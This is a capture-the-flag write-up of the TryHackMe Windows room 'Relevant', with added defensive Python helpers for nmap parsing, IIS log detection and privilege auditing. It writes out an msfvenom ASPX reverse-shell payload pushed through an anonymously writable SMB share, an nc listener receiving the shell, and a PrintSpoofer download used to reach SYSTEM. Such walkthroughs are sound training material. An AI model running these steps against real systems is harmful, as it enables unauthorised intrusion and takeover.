#tryhackme #windows #medium

![[Pasted image 20250710233019.png]]

---

# Information Gathering

- Nmap TCP scan against all ports reveals 8 open ports.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-10 20:51 CDT
Nmap scan report for 10.10.124.72
Host is up (0.12s latency).
Not shown: 65527 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49663/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 43.95 seconds
```

- TCP scan against the open ports found above, with the `-sCV` options to get more detailed service information.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV $IP -p 80,135,139,445,3389,49663,49666,49667
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-10 20:54 CDT
Nmap scan report for 10.10.124.72
Host is up (0.13s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2025-07-10T01:49:40
|_Not valid after:  2026-01-09T01:49:40
| rdp-ntlm-info:
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2025-07-11T01:55:28+00:00
|_ssl-date: 2025-07-11T01:56:07+00:00; -1s from scanner time.
49663/tcp open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-07-10T18:55:31-07:00
| smb2-time:
|   date: 2025-07-11T01:55:29
|_  start_date: 2025-07-11T01:49:40

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.10 seconds
```

- UDP scan against the top 10 ports.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-10 20:57 CDT
Nmap scan report for 10.10.124.72
Host is up (0.12s latency).

PORT     STATE         SERVICE
53/udp   open|filtered domain
67/udp   open|filtered dhcps
123/udp  open|filtered ntp
135/udp  open|filtered msrpc
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
161/udp  open|filtered snmp
445/udp  open|filtered microsoft-ds
631/udp  open|filtered ipp
1434/udp open|filtered ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 2.64 seconds
```

---

# Footprinting

##### Port 445 - SMB

I tried listing shares with `smbclient` against the IP address and it actually revealed 4 available shares.
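The full-port scan above feeds the port list of the `-sCV` scan. Here is an added Python helper (my own example, not part of the original write-up) that parses nmap's normal output for ports in state `open`, builds the `-p` value for the follow-up scan, and separately lists the open ports nmap could not name, which are the ones that deserve version detection most (on this box one of them, 49663, turned out to be a second IIS site). The embedded sample is a trimmed, constructed copy of the first scan above.

```python
import re

# Constructed sample: a trimmed copy of the "-sS -p-" scan output above,
# kept in nmap's normal-output format so the parser sees the real column layout.
SAMPLE_SCAN = """\
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-10 20:51 CDT
Nmap scan report for 10.10.124.72
Host is up (0.12s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49663/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 43.95 seconds
"""

# One port line: "<port>/<proto>  <state>  <service>[ <version ...>]"
PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)", re.MULTILINE)


def port_table(scan_output: str, proto: str = "tcp"):
    """Yield (port, state, service) for every port line of the given protocol."""
    for m in PORT_LINE.finditer(scan_output):
        port, p, state, service = m.groups()
        if p == proto:
            yield int(port), state, service


def open_ports(scan_output: str, proto: str = "tcp") -> list:
    """Ports reported exactly 'open'; UDP 'open|filtered' guesses are excluded."""
    return sorted({port for port, state, _ in port_table(scan_output, proto)
                   if state == "open"})


def port_arg(scan_output: str, proto: str = "tcp") -> str:
    """Comma-separated value for nmap's -p option, as used by the follow-up -sCV scan."""
    return ",".join(str(p) for p in open_ports(scan_output, proto))


def unnamed_open_ports(scan_output: str, proto: str = "tcp") -> list:
    """Open ports nmap could not map to a service name; these need version detection."""
    return sorted(port for port, state, service in port_table(scan_output, proto)
                  if state == "open" and service == "unknown")


def follow_up_command(scan_output: str, target: str = "$IP") -> str:
    """The second scan command from the write-up, built from the first scan's output."""
    return f"nmap -sCV {target} -p {port_arg(scan_output)}"


if __name__ == "__main__":
    print(follow_up_command(SAMPLE_SCAN))
    print("open ports without a service name:", unnamed_open_ports(SAMPLE_SCAN))
```

Feed it a saved scan (`nmap ... -oN scan.txt`) instead of the sample and the same functions apply; the regex only relies on the `port/proto state service` columns, which nmap has kept stable across versions.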
The share `nt4wrksv` stood out to me because the rest of the shares are default ones.

```bash
root@ip-10-10-151-101:~# smbclient -N -L $IP

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	nt4wrksv        Disk
SMB1 disabled -- no workgroup available
```

The share `nt4wrksv` allowed a null session, meaning we could access it without supplying any password. In the share, there was only one file named `passwords.txt`.

```bash
root@ip-10-10-151-101:~# smbclient //$IP/nt4wrksv
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 25 22:46:04 2020
  ..                                  D        0  Sat Jul 25 22:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 16:15:33 2020

		7735807 blocks of size 4096. 4950767 blocks available
smb: \>
```

Inside the file, the first line read `User Passwords - Encoded` and the other two lines appeared to be Base64-encoded. After decoding them, I found two sets of credentials. I tried to connect to RDP with the found credentials but failed.

![[Pasted image 20250710213753.png]]

The `nmap` vuln scripts report that the SMB service on port 445 has a known vulnerability, MS17-010 (`CVE-2017-0143`).

```bash
root@ip-10-10-151-101:~# nmap --script vuln $IP -p 139,445
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-11 04:24 BST
Nmap scan report for ip-10-10-218-16.eu-west-1.compute.internal (10.10.218.16)
Host is up (0.00012s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 02:44:41:DC:80:7B (Unknown)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 15.82 seconds
```

##### Port 80

The landing page of the service on port 80 is just a Microsoft IIS default page.

![[Pasted image 20250710213908.png]]

`gobuster` found several candidate paths, but all of them were inaccessible (HTTP 400).
```bash
root@ip-10-10-151-101:~# gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.218.16
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/*checkout*           (Status: 400) [Size: 3420]
/*docroot*            (Status: 400) [Size: 3420]
/*                    (Status: 400) [Size: 3420]
/http%3A%2F%2Fwww     (Status: 400) [Size: 3420]
/q%26a                (Status: 400) [Size: 3420]
/http%3A              (Status: 400) [Size: 3420]
/**http%3a            (Status: 400) [Size: 3420]
/*http%3A             (Status: 400) [Size: 3420]
/**http%3A            (Status: 400) [Size: 3420]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 3420]
/http%3A%2F%2Fblogs   (Status: 400) [Size: 3420]
/http%3A%2F%2Fblog    (Status: 400) [Size: 3420]
/**http%3A%2F%2Fwww   (Status: 400) [Size: 3420]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
```

# Exploit - Initial Access

##### Port 49663

`Gobuster` revealed the same paths as on port 80. I looked everywhere but couldn't find any leads to move forward from here. Then I thought to navigate to the share we found on the SMB server, and it actually worked! It turns out the entire contents of `nt4wrksv` are directly accessible over HTTP on port 49663.

![[Pasted image 20250710223955.png]]

I'm going to upload a reverse shell payload to the SMB share `nt4wrksv` and take advantage of the fact that it's accessible via a web browser to trigger the shell.
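From the defender's side, the path just described (writing into a share that IIS also serves, then requesting the file) leaves a clear trace in the IIS W3C logs: a request for a script-handled extension under the share-backed directory for a file no deployment put there. The following Python snippet is an added detection example, not code from the write-up, that parses W3C-format IIS log lines and flags such requests. The log lines, the `SHARE_BACKED_DIRS` mapping and the empty `KNOWN_APP_FILES` baseline are constructed assumptions for the example.

```python
from urllib.parse import unquote

# Assumptions for this example: these IIS virtual directories are backed by an
# SMB share that untrusted users can write to, and these are the script files
# legitimately deployed under them (none, in this case).
SHARE_BACKED_DIRS = {"/nt4wrksv"}
KNOWN_APP_FILES = set()

# Extensions IIS passes to a script handler instead of serving as static content.
SCRIPT_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx", ".asax", ".cshtml")

# Constructed W3C-format log lines (IIS writes spaces inside a field as '+').
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-11 04:54:10 10.10.218.16 GET / - 49663 - 10.10.151.101 Mozilla/5.0+(X11) - 200 0 0 15
2025-07-11 04:54:20 10.10.218.16 GET /nt4wrksv/passwords.txt - 49663 - 10.10.151.101 Mozilla/5.0+(X11) - 200 0 0 3
2025-07-11 04:54:31 10.10.218.16 GET /default.aspx - 80 - 10.10.151.101 Mozilla/5.0+(X11) - 200 0 0 4
2025-07-11 04:55:02 10.10.218.16 GET /nt4wrksv/revshell.aspx - 49663 - 10.10.151.101 Mozilla/5.0+(X11) - 200 0 0 2021
2025-07-11 04:55:40 10.10.218.16 GET /nt4wrksv/Rev%53hell.aspx - 49663 - 10.10.151.101 Mozilla/5.0+(X11) - 404 0 2 1
this line is truncated and must be skipped
"""


def parse_w3c_log(text):
    """Yield one dict per request, using the #Fields: directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed or truncated line: never mis-map columns silently
        yield dict(zip(fields, values))


def share_dir_for(stem):
    """Return the share-backed directory a decoded, lowercased stem lives under, or None."""
    for d in SHARE_BACKED_DIRS:
        d = d.lower().rstrip("/")
        if stem == d or stem.startswith(d + "/"):
            return d
    return None


def find_script_requests_in_shares(text):
    """Requests for script files inside share-backed directories that are not
    part of the deployed application baseline (successful or not)."""
    alerts = []
    for rec in parse_w3c_log(text):
        stem = unquote(rec["cs-uri-stem"]).lower()  # normalise %-encoding and case
        if share_dir_for(stem) is None or not stem.endswith(SCRIPT_EXTENSIONS):
            continue
        if stem in KNOWN_APP_FILES:
            continue
        alerts.append({
            "when": f"{rec['date']} {rec['time']}",
            "client": rec["c-ip"],
            "port": rec["s-port"],
            "uri": stem,
            "status": rec["sc-status"],
        })
    return alerts


if __name__ == "__main__":
    for alert in find_script_requests_in_shares(SAMPLE_LOG):
        print(alert)
```

The detection is only a backstop: the durable fix is to stop exposing a writable share through IIS at all, or at least to remove the script handler mappings and execute permission for that virtual directory, and to stop the share from being writable over a null session.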
I'm using `msfvenom` to create the reverse shell payload, and the payload type will be `.aspx` since the web server is running `IIS`, which supports `.aspx` files by default.

```bash
root@ip-10-10-151-101:~# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.151.101 LPORT=1234 -f aspx -o revshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3414 bytes
Saved as: revshell.aspx
```

```bash
root@ip-10-10-151-101:~# smbclient //$IP/nt4wrksv
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> put revshell.aspx
putting file revshell.aspx as \revshell.aspx (1666.9 kb/s) (average 1667.0 kb/s)
smb: \> ls
  .                                   D        0  Fri Jul 11 04:53:47 2025
  ..                                  D        0  Fri Jul 11 04:53:47 2025
  passwords.txt                       A       98  Sat Jul 25 16:15:33 2020
  revshell.aspx                       A     3414  Fri Jul 11 04:53:47 2025

		7735807 blocks of size 4096. 5138963 blocks available
smb: \>
```

![[Pasted image 20250710225453.png]]

```bash
root@ip-10-10-151-101:~# nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.218.16 49898
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>
```

In `C:\Users\Bob\Desktop`, I found `user.txt`.

![[Pasted image 20250710225601.png]]

# Privilege Escalation

While enumerating for privilege escalation clues, the `whoami /priv` command revealed that the user `Bob` has `SeImpersonatePrivilege` enabled.

![[Pasted image 20250710231321.png]]

We are going to use the `PrintSpoofer64.exe` binary to abuse this privilege. To do so, we first download the binary on our Kali machine and then transfer it over to the remote Windows system.
`wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe`

![[Pasted image 20250710232252.png]]

![[Pasted image 20250710232641.png]]

The `PrintSpoofer64.exe -i -c powershell` command instantly creates an interactive PowerShell session as `SYSTEM`.

![[Pasted image 20250710232746.png]]

Found `root.txt`.

![[Pasted image 20250710232946.png]]
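The `whoami /priv` check that drove the privilege escalation section is worth automating when reviewing what service and application-pool identities are allowed to do. The added Python example below (mine, not from the write-up) parses `whoami /priv` output, reports which privileges from a short high-risk list are enabled, and separately lists the ones merely held, since a holder can re-enable a disabled privilege on its own token. The sample output is constructed to resemble what an IIS application-pool identity typically reports and is not copied from the write-up's screenshot.

```python
# High-risk privileges a service or application-pool identity should not hold
# unless it genuinely needs them; each is a well-known local privilege
# escalation path once enabled in a context an attacker can run code in.
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonate client tokens (the privilege PrintSpoofer abuses above)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeDebugPrivilege": "open and tamper with any process, including LSASS",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTcbPrivilege": "act as part of the operating system",
}

# Constructed sample modelled on "whoami /priv" for an IIS application-pool identity.
SAMPLE_WHOAMI_PRIV = """\

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_privileges(text):
    """Map privilege name -> (description, state) from 'whoami /priv' output.
    Rows start after the '=====' separator line; the state is the last column."""
    privileges = {}
    in_table = False
    for line in text.splitlines():
        stripped = line.strip()
        if not in_table:
            if stripped and set(stripped) <= {"=", " "}:
                in_table = True
            continue
        parts = stripped.split()
        if len(parts) < 2 or parts[-1] not in ("Enabled", "Disabled"):
            continue  # blank or unexpected line
        privileges[parts[0]] = (" ".join(parts[1:-1]), parts[-1])
    return privileges


def enabled_high_risk(text):
    """High-risk privileges that are held and currently enabled."""
    privileges = parse_privileges(text)
    return [name for name in HIGH_RISK_PRIVILEGES
            if privileges.get(name, ("", "Disabled"))[1] == "Enabled"]


def held_high_risk(text):
    """High-risk privileges held at all; a disabled one can be re-enabled by its holder."""
    privileges = parse_privileges(text)
    return [name for name in HIGH_RISK_PRIVILEGES if name in privileges]


def report(text):
    """One line per held high-risk privilege: name, state, why it matters."""
    privileges = parse_privileges(text)
    return "\n".join(f"{name:32} {privileges[name][1]:9} {HIGH_RISK_PRIVILEGES[name]}"
                     for name in held_high_risk(text))


if __name__ == "__main__":
    print(report(SAMPLE_WHOAMI_PRIV))
```

Run it against `whoami /priv` output captured from each service account on a host; an application-pool identity holding `SeImpersonatePrivilege` is the IIS default, so the review question is whether the code running under that identity can be reached by untrusted input (here it could, through the writable share), not merely whether the privilege is present.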